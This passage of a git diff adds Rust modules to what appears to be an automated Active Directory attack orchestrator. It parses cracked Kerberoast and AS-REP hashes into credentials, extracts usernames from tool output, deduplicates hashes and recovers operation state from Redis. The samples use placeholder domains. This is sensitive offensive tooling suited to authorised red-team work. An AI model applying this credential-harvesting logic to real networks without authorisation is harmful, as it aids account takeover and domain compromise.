+$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc:Summer2024!\n\ +$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$def:Summer2024!"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert_eq!(creds.len(), 1, "Should dedup same user@domain"); +} + +#[test] +fn test_extract_cracked_no_false_positives_on_uncracked() { + // Uncracked TGS hash should NOT produce a cracked credential + let output = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$contoso.local/svc_sql*$abc123def456"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert!( + creds.is_empty(), + "Uncracked hash should not produce credential" + ); +} + +#[test] +fn test_extract_cracked_john_not_triggered_without_context() { + // john --show format should only match if "password hash cracked" context is present + let output = "svc_sql:Summer2024!::::::::"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert!( + creds.is_empty(), + "John format without context should not match" + ); +} + +#[test] +fn test_extract_cracked_asrep_john_show_no_hex() { + // John --show for AS-REP omits the hex hash section + let output = "--- john --show ---\n\ + $krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:letmein2025\n\n\ + 1 password hash cracked, 0 left\n"; + let creds = extract_cracked_passwords(output, "child.contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "brian.davis"); + assert_eq!(creds[0].password, "letmein2025"); + assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); +} + +#[test] +fn test_extract_cracked_tgs_john_show_unknown_user() { + // John --show for TGS shows ?:password — extract user from TGS hash in same output + let output = "Loaded 1 password hash (krb5tgs)\n\ + $krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456\n\ + --- john --show ---\n\ + ?:iknownothing\n\n\ + 1 password hash cracked, 0 left\n"; + let creds = extract_cracked_passwords(output, "child.contoso.local"); + assert_eq!(creds.len(), 1); + assert_eq!(creds[0].username, "john.smith"); + assert_eq!(creds[0].password, "iknownothing"); + assert_eq!(creds[0].domain, "CHILD.CONTOSO.LOCAL"); + assert_eq!(creds[0].source, "cracked:john"); +} + +#[test] +fn test_extract_cracked_tgs_john_unknown_user_no_hash_context() { + // Without a TGS hash line in the output, ?:password is skipped + let output = "--- john --show ---\n\ + ?:iknownothing\n\n\ + 1 password hash cracked, 0 left\n"; + let creds = extract_cracked_passwords(output, "contoso.local"); + assert!(creds.is_empty(), "No TGS hash context = no credential"); +} + +#[test] +fn test_extract_cracked_no_false_positive_on_raw_asrep_hash() { + // Raw GetNPUsers AS-REP hash should NOT produce a cracked credential. + // The hash body is long hex+$ which is_valid_credential must reject. + let output = "$krb5asrep$23$brian.davis@CHILD.CONTOSO.LOCAL:7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae8410170fd08daf198b9269344aa64b9ad78f3f5b807dee0e8573e3bdec9fd90d0b46fa56baba08708f716d9b43a9f9bb2481ab56453d7a340f60ac478f6114f4fb0db7a424fd075f4cef9061954bf53ac6ac6dc3b0cc153b1bc909cac6cdcad9337022bf24ad2069d1991e9ca6eced54eb31f0016f3d9a2983c7f95c7f92261a8a1c435300576a98943a34046f4c08ecc4c6e81d9ca7aa3ae9a4baeb0e4071cd27c82203a225e741f4867afd15405552a47145ec3d79f1d5d19a90109b24ea593c26169fbccc54816f288a30c08ff34dc11bc105366685769b3edf9027be1dbad2f770edfa3ccd3f9524e93de40033464f07cdefb0"; + let creds = extract_cracked_passwords(output, "child.contoso.local"); + assert!( + creds.is_empty(), + "Raw AS-REP hash body should not be treated as cracked password" + ); +} + +#[test] +fn test_valid_credential_rejects_hash_body_password() { + // Long hex+$ strings should be rejected as hash fragments + assert!(!is_valid_credential( + "brian.davis", + "7dae198e2c2fd940e1cbb59d7817c755$ef0c20c7d3abaaf411eb7c9bfe28c6aeae" + )); + // Short real passwords should still pass + assert!(is_valid_credential("brian.davis", "letmein2025")); +} diff --git a/ares-cli/src/orchestrator/output_extraction/users.rs b/ares-cli/src/orchestrator/output_extraction/users.rs new file mode 100644 index 00000000..27dfd2f6 --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/users.rs @@ -0,0 +1,148 @@ +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::User; + +static RE_DOMAIN_CONTEXT: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)\(domain:([^)]+)\)").unwrap()); + +pub(crate) static RE_DOMAIN_BACKSLASH: LazyLock = + LazyLock::new(|| Regex::new(r"([A-Za-z0-9_.\-]+)\\([A-Za-z0-9_.\-$]+)").unwrap()); + +pub(crate) static RE_UPN: LazyLock = LazyLock::new(|| { + Regex::new(r"([A-Za-z0-9_.\-]+)@([A-Za-z0-9_.\-]+\.[A-Za-z0-9_.\-]+)").unwrap() +}); + +pub(crate) static RE_USER_BRACKET: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)user:\[([^\]]+)\]").unwrap()); + +pub(crate) static RE_ACCOUNT: LazyLock = + LazyLock::new(|| Regex::new(r"Account:\s*([A-Za-z0-9_.\-]+)").unwrap()); + +static RE_SAM: LazyLock = + LazyLock::new(|| Regex::new(r"(?i)samaccountname:\s*([A-Za-z0-9_.\-]+)").unwrap()); + +static RE_SMB_TIMESTAMP: LazyLock = LazyLock::new(|| { + Regex::new(r"SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z0-9_.\-]+)\s+\d{4}-\d{2}-\d{2}").unwrap() +}); + +/// Reject garbage usernames and invalid domains from regex extraction. +pub fn is_valid_extracted_user(username: &str, domain: &str) -> bool { + if username.is_empty() || username.ends_with('$') { + return false; + } + if username.bytes().any(|b| b < 0x20) || domain.bytes().any(|b| b < 0x20) { + return false; + } + if username.len() <= 1 { + return false; + } + let lower = username.to_lowercase(); + const NOISE: &[&str] = &[ + "anonymous", + "none", + "null", + "unknown", + "n/a", + "default", + "test", + "local", + "localhost", + "domain", + "workgroup", + ]; + if NOISE.contains(&lower.as_str()) { + return false; + } + if username.starts_with('_') || domain.starts_with('_') { + return false; + } + if !domain.contains('.') { + if domain.len() > 15 || domain.is_empty() { + return false; + } + if !domain + .bytes() + .all(|b| b.is_ascii_alphanumeric() || b == b'-') + { + return false; + } + } + if !username.bytes().all(|b| b.is_ascii_graphic()) { + return false; + } + true +} + +pub fn extract_users(output: &str, default_domain: &str) -> Vec { + let mut users = Vec::new(); + let mut seen = std::collections::HashSet::new(); + let mut current_domain = default_domain.to_string(); + + for line in output.lines() { + let stripped = line.trim(); + + if let Some(caps) = RE_DOMAIN_CONTEXT.captures(stripped) { + current_domain = caps + .get(1) + .unwrap() + .as_str() + .trim_end_matches('.') + .to_string(); + } + + let mut found = Vec::new(); + + if let Some(caps) = RE_DOMAIN_BACKSLASH.captures(stripped) { + let dom = caps.get(1).unwrap().as_str(); + let user = caps.get(2).unwrap().as_str(); + found.push((user.to_string(), dom.to_string())); + } + + if let Some(caps) = RE_UPN.captures(stripped) { + let user = caps.get(1).unwrap().as_str(); + let dom = caps.get(2).unwrap().as_str(); + found.push((user.to_string(), dom.to_string())); + } + + for caps in RE_USER_BRACKET.captures_iter(stripped) { + let user = caps.get(1).unwrap().as_str(); + found.push((user.to_string(), current_domain.clone())); + } + + if let Some(caps) = RE_ACCOUNT.captures(stripped) { + let user = caps.get(1).unwrap().as_str(); + found.push((user.to_string(), current_domain.clone())); + } + + if let Some(caps) = RE_SAM.captures(stripped) { + let user = caps.get(1).unwrap().as_str(); + found.push((user.to_string(), current_domain.clone())); + } + + if let Some(caps) = RE_SMB_TIMESTAMP.captures(stripped) { + let user = caps.get(1).unwrap().as_str(); + found.push((user.to_string(), current_domain.clone())); + } + + for (raw_username, raw_domain) in found { + let username = raw_username.trim().trim_end_matches('.').to_string(); + let domain = raw_domain.trim().trim_end_matches('.').to_string(); + if !is_valid_extracted_user(&username, &domain) { + continue; + } + let key = format!("{}@{}", username.to_lowercase(), domain.to_lowercase()); + if seen.insert(key) { + users.push(User { + username, + domain, + description: String::new(), + is_admin: false, + source: "output_extraction".to_string(), + }); + } + } + } + + users +} diff --git a/ares-cli/src/orchestrator/recovery/dedup.rs b/ares-cli/src/orchestrator/recovery/dedup.rs new file mode 100644 index 00000000..22da9a39 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/dedup.rs @@ -0,0 +1,273 @@ +//! Hash deduplication logic. + +use std::collections::HashSet; + +use tracing::info; + +use ares_core::models::Hash; + +/// Deduplicate hashes, keeping first occurrence. +/// +/// - **AS-REP hashes**: dedup by `(domain.lower(), username.lower())` since +/// each AS-REP request generates a different hash but cracks to the same +/// password. +/// - **Kerberoast/TGS hashes**: dedup by `(domain.lower(), username.lower(), +/// spn_key)` where spn_key is extracted from the hash format. +/// - **NTLM/other hashes**: dedup by exact `hash_value`. +pub fn dedupe_hashes(hashes: Vec) -> Vec { + let mut seen_asrep: HashSet<(String, String)> = HashSet::new(); + let mut seen_kerberoast: HashSet<(String, String, String)> = HashSet::new(); + let mut seen_other: HashSet = HashSet::new(); + let mut result = Vec::with_capacity(hashes.len()); + let original_len = hashes.len(); + + for h in hashes { + let hash_type = h.hash_type.trim().to_lowercase(); + let hash_value = &h.hash_value; + let username = h.username.trim().to_lowercase(); + let domain = h.domain.trim().to_lowercase(); + + let is_asrep = matches!(hash_type.as_str(), "as-rep" | "asrep" | "krb5asrep") + || hash_value.starts_with("$krb5asrep$"); + + let is_kerberoast = matches!( + hash_type.as_str(), + "kerberoast" | "krb5tgs" | "tgs-rep" | "tgs" + ) || hash_value.starts_with("$krb5tgs$"); + + if is_asrep { + let key = (domain, username); + if seen_asrep.contains(&key) { + continue; + } + seen_asrep.insert(key); + } else if is_kerberoast { + let spn_key = extract_kerberoast_spn_key(hash_value).unwrap_or_default(); + let key = (domain, username, spn_key); + if seen_kerberoast.contains(&key) { + continue; + } + seen_kerberoast.insert(key); + } else { + if seen_other.contains(hash_value) { + continue; + } + seen_other.insert(hash_value.clone()); + } + + result.push(h); + } + + let removed = original_len - result.len(); + if removed > 0 { + info!(removed = removed, "Deduplicated hashes"); + } + result +} + +/// Extract SPN and encryption type from a Kerberoast hash for deduplication. +/// +/// Hash format: `$krb5tgs$ETYPE$*user$realm$spn*$checksum$encrypted` +pub(crate) fn extract_kerberoast_spn_key(hash_value: &str) -> Option { + if !hash_value.starts_with("$krb5tgs$") { + return None; + } + let dollar_parts: Vec<&str> = hash_value.split('$').collect(); + if dollar_parts.len() < 4 { + return None; + } + let etype = dollar_parts[2]; + let asterisk_parts: Vec<&str> = hash_value.split('*').collect(); + if asterisk_parts.len() < 2 { + return None; + } + let inner_parts: Vec<&str> = asterisk_parts[1].split('$').collect(); + if inner_parts.len() < 3 { + return None; + } + let spn = inner_parts[2]; + Some(format!("{etype}:{spn}")) +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash { + Hash { + id: String::new(), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: hash_type.to_string(), + domain: domain.to_string(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + // --- extract_kerberoast_spn_key --- + + #[test] + fn test_extract_spn_key_valid() { + let hash = "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$ccdd"; + let key = extract_kerberoast_spn_key(hash); + assert!(key.is_some()); + let key = key.unwrap(); + assert!(key.starts_with("23:")); + assert!(key.contains("MSSQLSvc")); + } + + #[test] + fn test_extract_spn_key_not_krb5tgs() { + assert_eq!(extract_kerberoast_spn_key("$krb5asrep$23$user"), None); + } + + #[test] + fn test_extract_spn_key_too_short() { + assert_eq!(extract_kerberoast_spn_key("$krb5tgs$"), None); + } + + // --- dedupe_hashes --- + + #[test] + fn test_dedupe_ntlm_by_hash_value() { + let hashes = vec![ + make_hash( + "admin", + "contoso.local", + "ntlm", + "aabbccdd11223344aabbccdd11223344", + ), + make_hash( + "admin", + "contoso.local", + "ntlm", + "aabbccdd11223344aabbccdd11223344", + ), // dup + make_hash( + "admin", + "contoso.local", + "ntlm", + "eeff0011eeff0011eeff0011eeff0011", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 2); + } + + #[test] + fn test_dedupe_asrep_by_domain_user() { + let hashes = vec![ + make_hash( + "svc_web", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_web@CONTOSO.LOCAL:aabb", + ), + make_hash( + "svc_web", + "contoso.local", + "asrep", + "$krb5asrep$23$svc_web@CONTOSO.LOCAL:ccdd", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 1); // same user+domain → deduped + } + + #[test] + fn test_dedupe_asrep_different_users() { + let hashes = vec![ + make_hash( + "svc_web", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_web:aabb", + ), + make_hash( + "svc_sql", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_sql:ccdd", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 2); // different users → kept + } + + #[test] + fn test_dedupe_kerberoast_by_spn() { + let hashes = vec![ + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$aabb$cc", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$ddee$ff", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 1); // same SPN → deduped + } + + #[test] + fn test_dedupe_mixed_types() { + let hashes = vec![ + make_hash( + "admin", + "contoso.local", + "ntlm", + "aabbccdd11223344aabbccdd11223344", + ), + make_hash( + "svc_web", + "contoso.local", + "as-rep", + "$krb5asrep$23$svc_web:aabb", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc*$aa$bb", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 3); // all unique + } + + #[test] + fn test_dedupe_empty() { + let deduped = dedupe_hashes(vec![]); + assert!(deduped.is_empty()); + } + + #[test] + fn test_dedupe_case_insensitive() { + let hashes = vec![ + make_hash( + "Admin", + "CONTOSO.LOCAL", + "as-rep", + "$krb5asrep$23$Admin:aabb", + ), + make_hash( + "admin", + "contoso.local", + "as-rep", + "$krb5asrep$23$admin:ccdd", + ), + ]; + let deduped = dedupe_hashes(hashes); + assert_eq!(deduped.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/recovery/manager.rs b/ares-cli/src/orchestrator/recovery/manager.rs new file mode 100644 index 00000000..d0b4aae5 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/manager.rs @@ -0,0 +1,256 @@ +//! OperationRecoveryManager -- recovery of operation state from Redis. + +use std::collections::HashMap; + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tracing::{error, info, warn}; + +use ares_core::models::{TaskInfo, TaskStatus}; +use ares_core::state::{self, RedisStateReader}; + +use crate::orchestrator::task_queue::TaskQueue; + +use super::dedup::dedupe_hashes; +use super::normalize::{normalize_credential_domains, normalize_hash_domains}; +use super::requeue::requeue_task; +use super::types::{ + is_connection_error, RecoveredState, INTERRUPTED_STATUSES, MAX_CONNECTION_RETRIES, MAX_RETRIES, +}; + +/// Manages recovery of operation state from Redis after a restart. +pub struct OperationRecoveryManager { + redis_url: String, +} + +impl OperationRecoveryManager { + /// Create a new recovery manager. + pub fn new(redis_url: String) -> Self { + Self { redis_url } + } + + /// Attempt to recover an operation's state from Redis. + /// + /// 1. Checks that `ares:op:{operation_id}:meta` exists + /// 2. Loads full state via `RedisStateReader` + /// 3. Deduplicates hashes + /// 4. Normalizes credential/hash domains against netbios_to_fqdn map + /// 5. Loads pending tasks from `ares:op:{id}:pending_tasks` HASH + /// 6. Re-enqueues interrupted tasks (incrementing retry count) + /// 7. Returns recovered state + lists of requeued/failed task IDs + /// + /// Retries up to `MAX_CONNECTION_RETRIES` times on transient Redis errors. + pub async fn recover(&self, operation_id: &str) -> Result { + let mut last_err: Option = None; + + for attempt in 1..=MAX_CONNECTION_RETRIES { + let queue = match TaskQueue::connect(&self.redis_url).await { + Ok(q) => q, + Err(e) => { + if attempt < MAX_CONNECTION_RETRIES { + warn!( + attempt = attempt, + err = %e, + "Redis connection failed, retrying" + ); + last_err = Some(e); + continue; + } + return Err(e).context("Failed to connect to Redis for recovery"); + } + }; + + match Self::recover_inner(&queue, operation_id).await { + Ok(result) => return Ok(result), + Err(e) => { + if is_connection_error(&e) && attempt < MAX_CONNECTION_RETRIES { + warn!( + attempt = attempt, + err = %e, + "Transient Redis error during recovery, retrying" + ); + last_err = Some(e); + continue; + } + return Err(e); + } + } + } + + Err(last_err + .unwrap_or_else(|| anyhow::anyhow!("Recovery retry exhausted")) + .context("Recovery failed after retries")) + } + + /// Inner recovery logic (called within retry wrapper). + async fn recover_inner(queue: &TaskQueue, operation_id: &str) -> Result { + let mut conn = queue.connection(); + let reader = RedisStateReader::new(operation_id.to_string()); + + let exists = reader + .exists(&mut conn) + .await + .context("Failed to check operation existence")?; + if !exists { + anyhow::bail!( + "Operation {} not found in Redis -- cannot recover", + operation_id + ); + } + + let mut loaded_state = reader + .load_state(&mut conn) + .await + .context("Failed to load state from Redis")? + .ok_or_else(|| anyhow::anyhow!("Operation {} has no state data", operation_id))?; + + info!( + operation_id = operation_id, + credentials = loaded_state.all_credentials.len(), + hashes = loaded_state.all_hashes.len(), + hosts = loaded_state.all_hosts.len(), + has_domain_admin = loaded_state.has_domain_admin, + "State loaded for recovery" + ); + + let original_hash_count = loaded_state.all_hashes.len(); + loaded_state.all_hashes = dedupe_hashes(loaded_state.all_hashes); + let deduped = original_hash_count - loaded_state.all_hashes.len(); + if deduped > 0 { + info!(removed = deduped, "Deduplicated hashes during recovery"); + } + + let cred_fixed = normalize_credential_domains( + &mut loaded_state.all_credentials, + &loaded_state.netbios_to_fqdn, + ); + let hash_fixed = + normalize_hash_domains(&mut loaded_state.all_hashes, &loaded_state.netbios_to_fqdn); + + if cred_fixed > 0 || hash_fixed > 0 { + info!( + cred_fixed = cred_fixed, + hash_fixed = hash_fixed, + "Normalized domains during recovery" + ); + + if cred_fixed > 0 { + for cred in &loaded_state.all_credentials { + let _ = reader.add_credential(&mut conn, cred).await; + } + } + if hash_fixed > 0 { + for h in &loaded_state.all_hashes { + let _ = reader.add_hash(&mut conn, h).await; + } + } + } + + let pending_tasks_key = state::build_key(operation_id, state::KEY_PENDING_TASKS); + let raw_tasks: HashMap = + conn.hgetall(&pending_tasks_key).await.unwrap_or_default(); + + let mut pending_tasks: HashMap = HashMap::new(); + for (task_id, json_str) in &raw_tasks { + match serde_json::from_str::(json_str) { + Ok(task_info) => { + pending_tasks.insert(task_id.clone(), task_info); + } + Err(e) => { + warn!( + task_id = %task_id, + err = %e, + "Failed to deserialize pending task, skipping" + ); + } + } + } + + info!( + operation_id = operation_id, + pending_tasks = pending_tasks.len(), + "Loaded pending tasks for recovery" + ); + + let mut requeued_task_ids = Vec::new(); + let mut failed_task_ids = Vec::new(); + + for (task_id, task) in &mut pending_tasks { + if !INTERRUPTED_STATUSES.contains(&task.status) { + continue; + } + + // Increment retry count for tasks that were actively running + if task.status == TaskStatus::InProgress { + task.retry_count += 1; + } + + let max_retries = task.max_retries.max(MAX_RETRIES); + + if task.retry_count <= max_retries { + task.status = TaskStatus::Retrying; + if task.retry_count > 0 { + task.error = Some(format!( + "Pod restart during execution (retry {}/{})", + task.retry_count, max_retries + )); + } else { + task.error = Some("Requeued after pod restart (task was pending)".to_string()); + } + + match requeue_task(queue, task_id, task).await { + Ok(()) => { + requeued_task_ids.push(task_id.clone()); + info!( + task_id = %task_id, + retry_count = task.retry_count, + max_retries = max_retries, + "Task requeued for recovery" + ); + } + Err(e) => { + warn!( + task_id = %task_id, + err = %e, + "Failed to requeue task" + ); + } + } + } else { + // Exceeded max retries + task.status = TaskStatus::Failed; + task.error = Some(format!( + "Pod restart during execution (max retries {} exceeded)", + max_retries + )); + task.completed_at = Some(chrono::Utc::now()); + failed_task_ids.push(task_id.clone()); + error!( + task_id = %task_id, + retry_count = task.retry_count, + "Task permanently failed after max retries" + ); + } + } + + // Persist updated pending_tasks back to Redis + for (task_id, task) in &pending_tasks { + if let Ok(json) = serde_json::to_string(task) { + let _: Result<(), _> = conn.hset(&pending_tasks_key, task_id, &json).await; + } + } + + info!( + operation_id = operation_id, + requeued = requeued_task_ids.len(), + failed = failed_task_ids.len(), + "Recovery complete" + ); + + Ok(RecoveredState { + state: loaded_state, + requeued_task_ids, + failed_task_ids, + }) + } +} diff --git a/ares-cli/src/orchestrator/recovery/mod.rs b/ares-cli/src/orchestrator/recovery/mod.rs new file mode 100644 index 00000000..f9ea6fd5 --- /dev/null +++ b/ares-cli/src/orchestrator/recovery/mod.rs @@ -0,0 +1,440 @@ +//! Operation recovery manager. +//! +//! On startup, the orchestrator can recover state from a previous run by +//! loading it from Redis and re-enqueueing any interrupted tasks (those with +//! status PENDING, IN_PROGRESS, or RETRYING). +//! +//! Ported from `ares.core.recovery` (Python). Key additions over the initial +//! skeleton: +//! +//! - **Hash deduplication** (`dedupe_hashes`) -- AS-REP by (domain,username), +//! Kerberoast by (domain,username,spn_key), NTLM by exact hash value. +//! - **Pending-task requeuing** -- loads `ares:op:{id}:pending_tasks` HASH +//! instead of scanning global `ares:task_status:*` keys. +//! - **State normalization** -- fixes NetBIOS -> FQDN domain mismatches on +//! credentials and hashes, persists corrections back to Redis. +//! - **Connection error detection** with retry logic. +//! - **`OperationResumeHelper`** -- analysis methods for post-recovery summary. + +mod dedup; +mod manager; +mod normalize; +mod requeue; +mod resume_helper; +mod types; + +// Re-export all public items at the same paths they had before the split. +// Allow unused -- these re-exports document the module API and are needed by +// tests and by main.rs (OperationRecoveryManager). The remaining types are +// returned from public methods and would be needed by any future library consumer. +pub use manager::OperationRecoveryManager; +#[allow(unused_imports)] +pub use resume_helper::OperationResumeHelper; +#[allow(unused_imports)] +pub use types::{InterruptedTask, RecoveredState, RetryingTask}; + +// Items that were module-private in the original single file; re-exported +// here only for intra-crate use and tests. +#[allow(unused_imports)] +pub(crate) use dedup::dedupe_hashes; +#[allow(unused_imports)] +pub(crate) use normalize::{normalize_credential_domains, normalize_hash_domains, resolve_domain}; + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use std::collections::HashMap; + + use ares_core::models::{Credential, Hash, TaskInfo, TaskStatus}; + + use super::dedup::extract_kerberoast_spn_key; + use super::types::is_connection_error; + use super::*; + + fn make_hash(username: &str, domain: &str, hash_type: &str, hash_value: &str) -> Hash { + Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: hash_type.to_string(), + domain: domain.to_string(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + // --- Hash dedup tests --- + + #[test] + fn test_dedupe_asrep_by_domain_username() { + let hashes = vec![ + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@CONTOSO.LOCAL$aaaa", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@CONTOSO.LOCAL$bbbb", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@CONTOSO.LOCAL$cccc", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!( + result.len(), + 1, + "AS-REP hashes for same user should dedupe to 1" + ); + assert!( + result[0].hash_value.ends_with("$aaaa"), + "Should keep first occurrence" + ); + } + + #[test] + fn test_dedupe_asrep_different_users_kept() { + let hashes = vec![ + make_hash( + "edavis", + "contoso.local", + "as-rep", + "$krb5asrep$23$edavis@C$aaa", + ), + make_hash( + "fwilson", + "contoso.local", + "as-rep", + "$krb5asrep$23$fwilson@C$bbb", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 2, "Different users should be kept"); + } + + #[test] + fn test_dedupe_kerberoast_by_spn() { + let hashes = vec![ + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum1$enc1", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01.contoso.local*$checksum2$enc2", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 1, "Same SPN kerberoast hashes should dedupe"); + } + + #[test] + fn test_dedupe_kerberoast_different_spn_kept() { + let hashes = vec![ + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db01*$chk$enc", + ), + make_hash( + "svc_sql", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc_sql$CONTOSO.LOCAL$MSSQLSvc/db02*$chk$enc", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 2, "Different SPNs should be kept"); + } + + #[test] + fn test_dedupe_ntlm_by_exact_value() { + let hashes = vec![ + make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret + ), + make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0", // pragma: allowlist secret + ), + make_hash( + "admin", + "contoso.local", + "NTLM", + "aad3b435b51404eeaad3b435b51404ee:different_hash_value", // pragma: allowlist secret + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!( + result.len(), + 2, + "Identical NTLM hashes should dedupe, different kept" + ); + } + + #[test] + fn test_dedupe_mixed_types() { + let hashes = vec![ + // 2 AS-REP for same user -> 1 + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@C$a", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@C$b", + ), + // 1 NTLM + make_hash("admin", "contoso.local", "NTLM", "aad3b435:hash1"), // pragma: allowlist secret + // 1 Kerberoast + make_hash( + "svc", + "contoso.local", + "kerberoast", + "$krb5tgs$23$*svc$CONTOSO.LOCAL$SPN*$chk$enc", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!( + result.len(), + 3, + "Should keep 1 asrep + 1 ntlm + 1 kerberoast" + ); + } + + #[test] + fn test_dedupe_empty() { + let result = dedupe_hashes(vec![]); + assert!(result.is_empty()); + } + + #[test] + fn test_dedupe_case_insensitive() { + let hashes = vec![ + make_hash( + "EDavis", + "CONTOSO.LOCAL", + "asrep", + "$krb5asrep$23$EDavis@C$a", + ), + make_hash( + "edavis", + "contoso.local", + "asrep", + "$krb5asrep$23$edavis@C$b", + ), + ]; + let result = dedupe_hashes(hashes); + assert_eq!(result.len(), 1, "Case-insensitive dedup for AS-REP"); + } + + // --- Retry limit tests --- + + #[test] + fn test_retry_limit_not_exceeded() { + let task = TaskInfo { + task_id: "test_1".to_string(), + task_type: "recon".to_string(), + assigned_agent: "recon".to_string(), + status: TaskStatus::InProgress, + created_at: chrono::Utc::now(), + started_at: None, + completed_at: None, + last_activity_at: chrono::Utc::now(), + params: HashMap::new(), + result: None, + error: None, + retry_count: 2, + max_retries: 3, + }; + // retry_count (2) after increment (3) should still be <= max_retries (3) + assert!( + task.retry_count < task.max_retries, + "Task with retry_count=2 should still be requeueable" + ); + } + + #[test] + fn test_retry_limit_exceeded() { + let task = TaskInfo { + task_id: "test_2".to_string(), + task_type: "recon".to_string(), + assigned_agent: "recon".to_string(), + status: TaskStatus::InProgress, + created_at: chrono::Utc::now(), + started_at: None, + completed_at: None, + last_activity_at: chrono::Utc::now(), + params: HashMap::new(), + result: None, + error: None, + retry_count: 3, + max_retries: 3, + }; + // After increment: retry_count=4 > max_retries=3 + assert!( + task.retry_count + 1 > task.max_retries, + "Task with retry_count=3 after increment should exceed max" + ); + } + + // --- State normalization tests --- + + #[test] + fn test_normalize_credential_domains_netbios_to_fqdn() { + let mut creds = vec![ + Credential { + id: "1".to_string(), + username: "admin".to_string(), + password: "pass".to_string(), // pragma: allowlist secret + domain: "CONTOSO".to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }, + Credential { + id: "2".to_string(), + username: "user1".to_string(), + password: "pass2".to_string(), // pragma: allowlist secret + domain: "contoso.local".to_string(), // already FQDN + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + }, + ]; + + let mut netbios_map = HashMap::new(); + netbios_map.insert("CONTOSO".to_string(), "contoso.local".to_string()); + + let fixed = normalize_credential_domains(&mut creds, &netbios_map); + assert_eq!(fixed, 1); + assert_eq!(creds[0].domain, "contoso.local"); + assert_eq!(creds[1].domain, "contoso.local"); // unchanged + } + + #[test] + fn test_normalize_hash_domains() { + let mut hashes = vec![make_hash("admin", "FABRIKAM", "NTLM", "hash123")]; + + let mut netbios_map = HashMap::new(); + netbios_map.insert("FABRIKAM".to_string(), "fabrikam.local".to_string()); + + let fixed = normalize_hash_domains(&mut hashes, &netbios_map); + assert_eq!(fixed, 1); + assert_eq!(hashes[0].domain, "fabrikam.local"); + } + + #[test] + fn test_normalize_no_changes_when_fqdn() { + let mut creds = vec![Credential { + id: "1".to_string(), + username: "admin".to_string(), + password: "pass".to_string(), // pragma: allowlist secret + domain: 